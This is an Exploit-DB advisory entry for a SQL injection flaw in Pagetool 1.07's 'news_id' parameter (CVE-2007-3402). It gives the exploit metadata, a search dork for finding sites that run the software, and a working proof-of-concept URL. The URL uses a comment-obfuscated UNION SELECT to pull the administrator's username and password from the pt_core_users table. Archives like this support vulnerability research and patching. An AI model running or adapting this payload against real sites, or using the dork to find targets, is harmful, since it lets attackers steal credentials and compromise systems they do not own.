EXPLOITS

Pagetool 1.07 - 'news_id' SQL Injection

Author: Katatafish
type: webapps
platform: php
port: 
date_added: 2007-06-24  
date_updated: 2016-10-05  
verified: 1  
codes: OSVDB-38225;CVE-2007-3402  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.compagetool-1.07.tar.gz  

raw file: 4107.txt  

###pagetool-1.07 Remote SQL Injection###
#
#download:http://kent.dl.sourceforge.net/sourceforge/pagetool/pagetool-1.07.tar.gz
#
#Found by: Katatafish (karatatata@hush.com)
#
#Dork: "powered by Pagetool"
#
#Thanks: str0ke
#
########################################

#PoC
http://www.site.com/[path]/index.php?name=pagetool_news&news_id=-1/**/union/**/all/**/select/**/null,/**/null,/**/CONCAT(0x557365726E346D653A20,/**/username),/**/CONCAT(0x50617373773072643A20,/**/passwd),/**/null/**/from/**/pt_core_users/**/where/**/user_id=1

# milw0rm.com [2007-06-25]